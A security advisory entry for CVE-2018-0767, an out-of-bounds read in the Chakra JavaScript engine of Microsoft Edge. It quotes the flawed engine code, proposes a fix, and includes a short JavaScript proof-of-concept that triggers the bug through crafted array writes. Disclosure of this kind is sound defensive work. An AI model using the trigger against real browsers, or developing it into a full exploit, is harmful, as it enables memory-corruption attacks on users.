Microsoft Edge: Chakra: OOB read in AppendLeftOverItemsFromEndSegment(CVE-2018-0767)

2018-01-22T00:00:00
ID SSV:97092
Type seebug
Reporter Root
Modified 2018-01-22T00:00:00

Description

Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl. growby = endSeg-&gt;length; current = current-&gt;GrowByMin(recycler, growby); CopyArray(current-&gt;elements + endIndex + 1, endSeg-&gt;length, ((Js::SparseArraySegment&lt;T&gt;*)endSeg)-&gt;elements, endSeg-&gt;length); LinkSegments((Js::SparseArraySegment&lt;T&gt;*)startPrev, current); if (HasNoMissingValues()) { if (ScanForMissingValues&lt;T&gt;(endIndex + 1, endIndex + growby)) { SetHasNoMissingValues(false); } } In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method. I guess it shoud be like: ``` if (current == head && HasNoMissingValues()) { if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby)) { SetHasNoMissingValues(false); } }

function trigger() { let arr = [1.1]; let i = 0; for (; i < 1000; i += 0.5) { arr[i + 0x7777] = 2.0; }

arr[1001] = 35480.0;

for (; i &lt; 0x7777; i++) {
    arr[i] = 1234.3;
}

}

for (let i = 0; i < 100; i++) { trigger(); } ```